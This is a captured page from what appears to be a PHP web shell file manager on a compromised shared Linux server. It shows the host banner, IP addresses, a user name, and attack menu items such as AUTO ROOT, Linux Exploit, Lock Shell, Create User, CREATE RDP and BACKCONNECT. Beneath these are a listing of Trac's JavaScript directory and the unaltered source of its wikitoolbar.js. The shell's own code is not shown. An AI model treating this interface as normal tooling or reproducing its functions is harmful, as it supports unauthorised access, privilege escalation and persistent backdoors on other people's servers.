Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
trac /
htdocs /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
messages
[ DIR ]
drwxr-xr-x
admin_enums.js
2.96
KB
-rw-r--r--
auto_preview.js
5.35
KB
-rw-r--r--
babel.js
6.76
KB
-rw-r--r--
blame.js
3.45
KB
-rw-r--r--
diff.js
4.52
KB
-rw-r--r--
expand_dir.js
6.16
KB
-rw-r--r--
folding.js
2.68
KB
-rw-r--r--
jquery-ui-addons.js
76.71
KB
-rw-r--r--
jquery-ui.js
535.7
KB
-rw-r--r--
jquery.js
87
KB
-rw-r--r--
keyboard_nav.js
2.78
KB
-rw-r--r--
log_graph.js
1.18
KB
-rw-r--r--
noconflict.js
228
B
-rw-r--r--
query.js
19.75
KB
-rw-r--r--
resizer.js
930
B
-rw-r--r--
search.js
3.21
KB
-rw-r--r--
threaded_comments.js
6
KB
-rw-r--r--
timeline_multirepos.js
1.48
KB
-rw-r--r--
trac.js
8.55
KB
-rw-r--r--
wiki.js
2.58
KB
-rw-r--r--
wikitoolbar.js
3.15
KB
-rw-r--r--
workflow_graph.js
8.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wikitoolbar.js
(function($){ window.addWikiFormattingToolbar = function(textarea) { if ((document.selection == undefined) && (textarea.setSelectionRange == undefined)) { return; } var toolbar = document.createElement("div"); toolbar.className = "wikitoolbar"; function addButton(type, title, fn) { var a = document.createElement("a"); a.href = "#"; a.className = "trac-wikitoolbar-" + type; a.title = title; a.onclick = function() { if ($(textarea).prop("disabled") === false && $(textarea).prop("readonly") === false) { try { fn() } catch (e) { } } return false; }; a.tabIndex = 400; toolbar.appendChild(a); } function encloseSelection(prefix, suffix) { textarea.focus(); var start, end, sel, scrollPos, subst; if (document.selection != undefined) { sel = document.selection.createRange().text; } else if (textarea.setSelectionRange != undefined) { start = textarea.selectionStart; end = textarea.selectionEnd; scrollPos = textarea.scrollTop; sel = textarea.value.substring(start, end); } if (sel.match(/ $/)) { // exclude ending space char, if any sel = sel.substring(0, sel.length - 1); suffix = suffix + " "; } subst = prefix + sel + suffix; if (document.selection != undefined) { var range = document.selection.createRange().text = subst; textarea.caretPos -= suffix.length; } else if (textarea.setSelectionRange != undefined) { textarea.value = textarea.value.substring(0, start) + subst + textarea.value.substring(end); if (sel) { textarea.setSelectionRange(start + subst.length, start + subst.length); } else { textarea.setSelectionRange(start + prefix.length, start + prefix.length); } textarea.scrollTop = scrollPos; } } addButton("strong", _("Bold text: **Example**"), function() { encloseSelection("**", "**"); }); addButton("em", _("Italic text: ''Example''"), function() { encloseSelection("''", "''"); }); addButton("heading", _("Heading: == Example"), function() { encloseSelection("\n== ", "", "Heading"); }); addButton("link", _("Link: [http://www.example.com/ Example]"), function() { encloseSelection("[", "]"); }); addButton("code", _("Code block: {{{ example }}}"), function() { encloseSelection("\n{{{\n", "\n}}}\n"); }); addButton("hr", _("Horizontal rule: ----"), function() { encloseSelection("\n----\n", ""); }); addButton("np", _("New paragraph"), function() { encloseSelection("\n\n", ""); }); addButton("br", _("Line break: \\\\"), function() { encloseSelection("\\\\\n", ""); }); addButton("img", _("Image: [[Image()]]"), function() { encloseSelection("[[Image(", ")]]"); }); $(textarea).before(toolbar); } // Add toolbar to all <textarea> elements on the page with the class 'wikitext'. $(function() { $("textarea.wikitext").each(function() { addWikiFormattingToolbar(this) }); }); })(jQuery);
Close